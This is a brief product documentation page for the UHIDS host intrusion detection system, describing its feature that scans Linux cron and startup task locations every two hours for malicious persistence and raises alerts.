Malicious Scheduled Task Detection
UHIDS’ self-developed malicious scheduled task detection feature has behavior analysis methods for malicious scheduled tasks. By combining cloud-based big data analysis and static rules in the detection system, it can detect common hacker behaviors where scheduled tasks are used to hide and protect malicious processes and trojans.
Detection Principle
After installing the Agent client plugin, UHIDS automatically reads the contents from the common scheduled task directories and locations on the system. The read content is analyzed, and based on the specific task behavior, it is assessed for malicious activity, triggering an alert notification.
Detection Cycle
- By default, the plugin checks every 2 hours when started.
- After clearing the risk, the system will recheck the same risk within 2 hours. If the risk is fixed, the alert will be automatically deleted.
Detection Items
| Detection Item | Description |
|---|---|
| Crontab Scheduled Task Detection | Detection of scheduled tasks in Linux’ cron settings. |
| Startup Task Detection | Detection of startup tasks in Linux system startup settings. |